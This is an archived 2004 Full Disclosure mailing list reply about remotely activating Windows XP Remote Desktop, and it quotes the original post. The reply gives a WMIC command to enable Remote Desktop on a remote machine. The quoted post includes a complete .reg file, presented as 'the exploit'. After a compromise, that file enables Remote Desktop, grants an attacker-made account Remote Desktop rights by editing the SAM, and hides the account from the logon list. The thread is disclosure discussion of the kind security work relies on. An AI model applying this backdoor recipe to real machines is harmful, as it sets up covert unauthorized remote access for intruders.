Full Disclosure mailing list archives
RE: XP Remote Desktop Remote Activation
From: "Dominick Baier" <seclists () leastprivilege com>
Date: Sat, 2 Oct 2004 17:43:11 +0200
if you have an administrator password for the machine you can just use WMIC to turn remote desktop on. wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" CALL SetAllowTSConnections 1 dominick www.leastprivilege.com -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Fixer Sent: Samstag, 2. Oktober 2004 06:51 To: full-disclosure () lists netsys com Subject: [Full-disclosure] XP Remote Desktop Remote Activation XP Remote Desktop Remote Activation Information ____________________________________________________________________ Windows XP Professional provides a service called Remote Desktop, which allows a user to remotely control the desktop as if he or she were in front of the system locally (ala VNC, pcAnywhere, etc.). By default, Remote Desktop is shipped with this service turned off and only the Administrator is allowed access to this service. It is possible, however, to modify a series of registry keys that may allow a malicious user who has already gained a command shell to activate Remote Desktop and add a user they have created for themselves as well as to hide that user so that it will not show up as a user in the Remote Desktop user list. The instructions for this are attached. Additionally, I have listed a sample .reg file of the type that is discussed in the instructions below. _____________________________________________________________________ Final Stuff To the Frozen Chozen...On-On (www.frozen-chozen-h3.org) On to the exploit.... Fixer _____________________________________________________________________ .reg file (remember, the xx xx are the values you need to change) Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B] "C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00 ,\ 00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\ 01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\ 00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\ 00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\ 00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\ 00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\ 00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\ 00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\ 00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\ 6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\ 00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\ 20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\ 00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\ 67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\ 00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\ 00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "fDenyTSConnections"=dword:00000000 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] "lus3r"=dword:00000000 (obviously change "lus3r" to the name of the account you created) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- XP Remote Desktop Remote Activation Fixer (Oct 02)
- Re: XP Remote Desktop Remote Activation morning_wood (Oct 02)
- Re: XP Remote Desktop Remote Activation Joel R. Helgeson (Oct 02)
- RE: XP Remote Desktop Remote Activation Dominick Baier (Oct 02)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 02)
- RE: XP Remote Desktop Remote Activation Larry Seltzer (Oct 02)
- Re: XP Remote Desktop Remote Activation H D Moore (Oct 03)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 03)
- <Possible follow-ups>
- RE:XP Remote Desktop Remote Activation RandallM (Oct 02)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 02)
- Re: XP Remote Desktop Remote Activation morning_wood (Oct 02)